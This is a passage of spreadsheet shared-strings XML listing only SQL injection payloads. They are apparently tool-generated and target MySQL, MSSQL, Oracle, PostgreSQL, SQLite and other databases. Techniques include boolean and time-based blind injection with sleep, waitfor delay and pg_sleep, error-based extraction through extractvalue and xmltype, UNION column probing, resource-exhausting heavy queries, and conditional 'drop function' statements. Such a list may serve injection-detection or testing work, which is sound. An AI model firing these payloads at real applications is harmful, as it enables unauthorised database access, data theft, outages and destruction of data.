    <t>1'|| ( select 'qdkb' where 4331 = 4331</t>
  </si>
  <si>
    <t>1" )  where 7228 = 7228</t>
  </si>
  <si>
    <t>1'  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>1'  )  )   )  waitfor delay '0:0:5' and   (  (   ( 'clcf' = 'clcf</t>
  </si>
  <si>
    <t>1 and 2620 = 2175</t>
  </si>
  <si>
    <t>1' )  as fyib where 9246 = 9246</t>
  </si>
  <si>
    <t>1'+ ( select 'vkis' where 3712 = 3712  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users  )  )  +'</t>
  </si>
  <si>
    <t>1'|| ( select 'tjzy' where 3037 = 3037</t>
  </si>
  <si>
    <t>1'  )  )   rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   (  (  'krvo' like 'krvo</t>
  </si>
  <si>
    <t>1" )  as zjwu where 9963 = 9963 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>-3136%' )  or 3400 = 6002</t>
  </si>
  <si>
    <t>1'  )  )   )  rlike sleep ( 5 )  and   (  (   ( 'zwyx' = 'zwyx</t>
  </si>
  <si>
    <t>1%'  )  )   )  union all select null,null,null--</t>
  </si>
  <si>
    <t>-7939" )  or 3958 = 6909</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select  ( case when  ( 4232 = 4232 )  then  ( select benchmark ( 5000000,md5 ( 0x6b637544  )  )   )  else 4232* ( select 4232 from mysql.db )  end  )  )  </t>
  </si>
  <si>
    <t>1 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1%' )  waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1" )  as pwvu where 8267 = 8267</t>
  </si>
  <si>
    <t>1" )  and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1'  )  )   )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 'zglq' = 'zglq</t>
  </si>
  <si>
    <t>1%" and 2805 = 1345</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and "mpxd" like "mpxd</t>
  </si>
  <si>
    <t xml:space="preserve">1' or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) </t>
  </si>
  <si>
    <t>-6720'  )  )   )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 )</t>
  </si>
  <si>
    <t>-5854  )  )   )  union all select 5645#</t>
  </si>
  <si>
    <t>1 )  where 3030 = 3030</t>
  </si>
  <si>
    <t>-9526 where 5734 = 5734 or elt ( 1032 = 1032,3623 ) --</t>
  </si>
  <si>
    <t>1" where 9173 = 9173 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve">1' or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  </t>
  </si>
  <si>
    <t>-2983' )  or 8571 = 8571--</t>
  </si>
  <si>
    <t>-8054'  )  )   union all select 5232,5232,5232,5232,5232,5232,5232#</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( 'ckpm' = 'ckpm</t>
  </si>
  <si>
    <t>1' )  where 3636 = 3636 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>-1653 union all select 8415,8415,8415,8415,8415,8415,8415,8415#</t>
  </si>
  <si>
    <t>-6629%"  )  )   )  or 8571 = 8571--</t>
  </si>
  <si>
    <t>1 )  as drbw where 2380 = 2380 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  --</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>1'  )  )   and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'fzcu' where 9252 = 9252 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1  )  )  ||'</t>
  </si>
  <si>
    <t xml:space="preserve">-5355" or make_set ( 9354 = 9354,7185 ) </t>
  </si>
  <si>
    <t>1' where 4039 = 4039 union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1  )  )   as zmsa where 6909 = 6909 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1'  )  )   and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (  'tjvy' like 'tjvy</t>
  </si>
  <si>
    <t>1%'  )  )   and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select  ( case when  ( 1938 = 1938 )  then dbms_pipe.receive_message ( chr ( 118 ) ||chr ( 118 ) ||chr ( 112 ) ||chr ( 76 ) ,5 )  else 1938 end )  from dual ) </t>
  </si>
  <si>
    <t>1" )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and  ( "lsis" like "lsis</t>
  </si>
  <si>
    <t>1  )  )   as lkqx where 6468 = 6468 or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>1'|| ( select 'ogyu' from dual where 6691 = 6691</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and  ( 4863 = 4863</t>
  </si>
  <si>
    <t>1%' and 6454 = 8348 and '%' = '</t>
  </si>
  <si>
    <t>1'  )  )   )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and   (  (   ( 'yznn' like 'yznn</t>
  </si>
  <si>
    <t>1%' and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and '%' = '</t>
  </si>
  <si>
    <t>1  )  )   as pynj where 7683 = 7683 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1' where 1085 = 1085 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1%'  )  )   and 1651 = 9324 and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1  )  )   and 4595 = 4595#</t>
  </si>
  <si>
    <t>1 )  where 3979 = 3979 rlike sleep ( 5 ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4501 = 4501 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) </t>
  </si>
  <si>
    <t>1"  )  )   or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and   (  (  "isbh" like "isbh</t>
  </si>
  <si>
    <t xml:space="preserve">1" and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) </t>
  </si>
  <si>
    <t>1%' )  or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1'+ ( select 'tbfj' where 4016 = 4016</t>
  </si>
  <si>
    <t>1"  )  )   and elt ( 4249 = 4249,7259 )  and   (  (  "xjdh" = "xjdh</t>
  </si>
  <si>
    <t>-1385'  )  )   )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (   ( 'mjjd' = 'mjjd</t>
  </si>
  <si>
    <t>-3581'|| ( select 'uxmh' from dual where 8954 = 8954 union all select 8954,8954,8954,8954,8954,8954#</t>
  </si>
  <si>
    <t>-5245' or elt ( 1032 = 1032,3623 )  and 'qfvo' = 'qfvo</t>
  </si>
  <si>
    <t>-2168 )  union all select 4980,4980,4980,4980,4980,4980,4980,4980,4980--</t>
  </si>
  <si>
    <t>-5145' where 2334 = 2334 union all select 2334,2334,2334,2334--</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and  ( "%" = "</t>
  </si>
  <si>
    <t>select  ( case when  ( 5464 = 9350 )  then 5464 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>1' )  where 5616 = 5616</t>
  </si>
  <si>
    <t>-8034" or 8571 = 8571--</t>
  </si>
  <si>
    <t>1'+ ( select 'nzgq' where 7230 = 7230 and elt ( 1210 = 1210,sleep ( 5  )  )   ) +'</t>
  </si>
  <si>
    <t>1" )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and  ( "mhfc" = "mhfc</t>
  </si>
  <si>
    <t>1'+ ( select 'qaar' where 7841 = 7841 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  )  +'</t>
  </si>
  <si>
    <t>1" )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( "bvdv" like "bvdv</t>
  </si>
  <si>
    <t>-4803%'  )  )   or 8571 = 8571--</t>
  </si>
  <si>
    <t>1"  )  )   as ylah where 9248 = 9248</t>
  </si>
  <si>
    <t>-9501' )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 1</t>
  </si>
  <si>
    <t>1'  )  )   )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( 'bmzj' like 'bmzj</t>
  </si>
  <si>
    <t>1 )  as caoa where 6139 = 6139 union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1' )  where 4509 = 4509 union all select null--</t>
  </si>
  <si>
    <t>1" )  where 5358 = 5358</t>
  </si>
  <si>
    <t>-1396 where 5838 = 5838 or 9323 = 9323#</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) -- rucf</t>
  </si>
  <si>
    <t>-7146" where 6431 = 6431 or 8548 = 5549--</t>
  </si>
  <si>
    <t>-7345%" or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 1</t>
  </si>
  <si>
    <t>-1139 )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>1' or elt ( 6272 = 6272,sleep ( 5  )  )   and 'vrim' = 'vrim</t>
  </si>
  <si>
    <t>-2001'+ ( select 'nput' where 8368 = 8368 union all select 8368,8368,8368,8368,8368,8368,8368,8368,8368#</t>
  </si>
  <si>
    <t>-8773%'  )  )   )  union all select 8941,8941,8941,8941,8941,8941#</t>
  </si>
  <si>
    <t xml:space="preserve">-7452' or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   </t>
  </si>
  <si>
    <t>1"  )  )   and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and   (  (  "nepk" = "nepk</t>
  </si>
  <si>
    <t>1%"  )  )   )  union all select null,null,null,null--</t>
  </si>
  <si>
    <t>1'  )  )   as hbdi where 6758 = 6758 and elt ( 1210 = 1210,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1'+ ( select 'kiqf' where 5920 = 5920</t>
  </si>
  <si>
    <t>-8032%'  )  )   )  or 9323 = 9323#</t>
  </si>
  <si>
    <t>-8783'  )  )   union all select 4834,4834,4834,4834,4834,4834,4834,4834,4834--</t>
  </si>
  <si>
    <t>1'  )  )   )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( 'sbey' = 'sbey</t>
  </si>
  <si>
    <t>1  )  )   )  and 2006 = 2006</t>
  </si>
  <si>
    <t xml:space="preserve">-3626%" )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  </t>
  </si>
  <si>
    <t>1  )  )   as qgma where 7675 = 7675 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>-4694%"  )  )   )  union all select 9178,9178,9178,9178,9178--</t>
  </si>
  <si>
    <t>1"  )  )   as qqhm where 7182 = 7182</t>
  </si>
  <si>
    <t>-1763%" or  ( 8459 = 8459 ) *4906 and "%" = "</t>
  </si>
  <si>
    <t>1"  )  )   )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( "wvyb" = "wvyb</t>
  </si>
  <si>
    <t>1'+ ( select 'qmtx' where 6992 = 6992 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1'  )  )   or sleep ( 5 )  and   (  (  'zxik' = 'zxik</t>
  </si>
  <si>
    <t>1' )  as ohcs where 9588 = 9588 or elt ( 6272 = 6272,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>-6155%'  )  )   union all select 2421,2421,2421,2421,2421#</t>
  </si>
  <si>
    <t>1%'  )  )   )  or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1' where 2690 = 2690</t>
  </si>
  <si>
    <t>if ( 2823 = 3532 )  select 2823 else drop function kmqw--</t>
  </si>
  <si>
    <t>-4095' )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1" and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and "tqbi" = "tqbi</t>
  </si>
  <si>
    <t>-9451%" )  union all select 9963,9963,9963--</t>
  </si>
  <si>
    <t>1' )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and  ( 'xdfz' = 'xdfz</t>
  </si>
  <si>
    <t>1'+ ( select brgo where 9100 = 9100 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1" and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and "qqfd" like "qqfd</t>
  </si>
  <si>
    <t>1' union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1'  )  )   as ticp where 9794 = 9794 union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'+ ( select jqyo where 4426 = 4426 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  )  +'</t>
  </si>
  <si>
    <t>1  )  )   as pjkd where 1105 = 1105 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  --</t>
  </si>
  <si>
    <t>-2153'|| ( select 'sofs' where 4126 = 4126 union all select 4126,4126,4126,4126,4126#</t>
  </si>
  <si>
    <t>1' or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and 'lxqz' = 'lxqz</t>
  </si>
  <si>
    <t>-6116"  )  )   union all select 3679,3679,3679,3679,3679,3679,3679--</t>
  </si>
  <si>
    <t>1 where 7906 = 7906 or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1'|| ( select 'lxpg' where 7390 = 7390 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  )  ||'</t>
  </si>
  <si>
    <t>1'  )  )   and sleep ( 5 )  and   (  (  'krrr' = 'krrr</t>
  </si>
  <si>
    <t>1'|| ( select 'kitk' where 6311 = 6311</t>
  </si>
  <si>
    <t>1'  )  )   )  union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-8069  )  )   as sxbn where 7689 = 7689 union all select 7689,7689,7689,7689,7689,7689,7689,7689,7689,7689--</t>
  </si>
  <si>
    <t>-1591 where 3291 = 3291 union all select 3291,3291,3291,3291,3291,3291,3291,3291,3291#</t>
  </si>
  <si>
    <t>1%' order by 1--</t>
  </si>
  <si>
    <t>-4606" )  as elek where 8261 = 8261 or 8571 = 8571--</t>
  </si>
  <si>
    <t>1'  )  )   )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( 'iari' = 'iari</t>
  </si>
  <si>
    <t>1'+ ( select qsmo where 3172 = 3172</t>
  </si>
  <si>
    <t>-4259'  )  )   as usqu where 5419 = 5419 or elt ( 8325 = 8837,8837 ) --</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 4595 = 4595#</t>
  </si>
  <si>
    <t>1%'  )  )   )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1" )  where 9295 = 9295 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1" )  as mohv where 2171 = 2171 or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>1'  )  )   as crzr where 5373 = 5373 and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1" )  as bpmk where 4506 = 4506</t>
  </si>
  <si>
    <t>1'+ ( select snam where 1993 = 1993</t>
  </si>
  <si>
    <t>1" )  as amak where 7938 = 7938 and elt ( 1210 = 1210,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1'|| ( select 'aevx' from dual where 9999 = 9999</t>
  </si>
  <si>
    <t>-8734%" )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||ch</t>
  </si>
  <si>
    <t>-1422%" )  or make_set ( 9539 = 9519,9519 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1"  )  )   )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( "agaz" = "agaz</t>
  </si>
  <si>
    <t xml:space="preserve">-1344 )  as gqgi where 2545 = 2545 or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 </t>
  </si>
  <si>
    <t>1' in boolean mode )  or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1' )  where 8707 = 8707 and 3210 = 1477--</t>
  </si>
  <si>
    <t>1'+ ( select 'yhcf' where 8367 = 8367</t>
  </si>
  <si>
    <t>1%'  )  )   and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>-7531'  )  )   )  union all select 6900,6900,6900,6900,6900,6900,6900,6900,6900#</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  (  3508 = 3508</t>
  </si>
  <si>
    <t>1 union all select null,null--</t>
  </si>
  <si>
    <t>1"  )  )   )  and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1" )  where 2152 = 2152</t>
  </si>
  <si>
    <t>1  )  )   and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (  9542 = 9542</t>
  </si>
  <si>
    <t>1"  )  )   as xtlt where 9293 = 9293</t>
  </si>
  <si>
    <t>1 )  as azdb where 4219 = 4219 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>1 )  where 9059 = 9059 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and 'pczr' = 'pczr</t>
  </si>
  <si>
    <t>1'|| ( select 'jrbp' from dual where 4129 = 4129 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>if ( 4947 = 5350 )  select 4947 else drop function ereg--</t>
  </si>
  <si>
    <t>1" )  where 7471 = 7471 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1  )  )   )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (   ( 4694 = 4694</t>
  </si>
  <si>
    <t>select  ( case when  ( 9343 = 9513 )  then 1 else 9343* ( select 9343 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>1%" or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and "%" = "</t>
  </si>
  <si>
    <t>1%' )  and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1'|| ( select 'vwmg' where 7928 = 7928</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 4460 = 1610,1,1/0 ) </t>
  </si>
  <si>
    <t>1'  )  )   and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1' )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( 'svhx' = 'svhx</t>
  </si>
  <si>
    <t>-3988'  )  )   union all select 1113#</t>
  </si>
  <si>
    <t>1'|| ( select 'jjpy' from dual where 6295 = 6295</t>
  </si>
  <si>
    <t>1'+ ( select gblp where 6768 = 6768</t>
  </si>
  <si>
    <t>1%'  )  )   )  and sleep ( 5 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1'|| ( select 'frrk' from dual where 3145 = 3145 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   ) ||'</t>
  </si>
  <si>
    <t>1" where 4688 = 4688 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  --</t>
  </si>
  <si>
    <t>-9178' )  or 9779 = 6351</t>
  </si>
  <si>
    <t>1' )  or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1'+ ( select kzgg where 5070 = 5070</t>
  </si>
  <si>
    <t>1" )  where 1392 = 1392 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) --</t>
  </si>
  <si>
    <t>-4637' union all select 9361,9361,9361,9361,9361,9361,9361,9361#</t>
  </si>
  <si>
    <t>1%' )  waitfor delay '0:0:5' and  ( '%' = '</t>
  </si>
  <si>
    <t>1  )  )   or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  8475 = 8475</t>
  </si>
  <si>
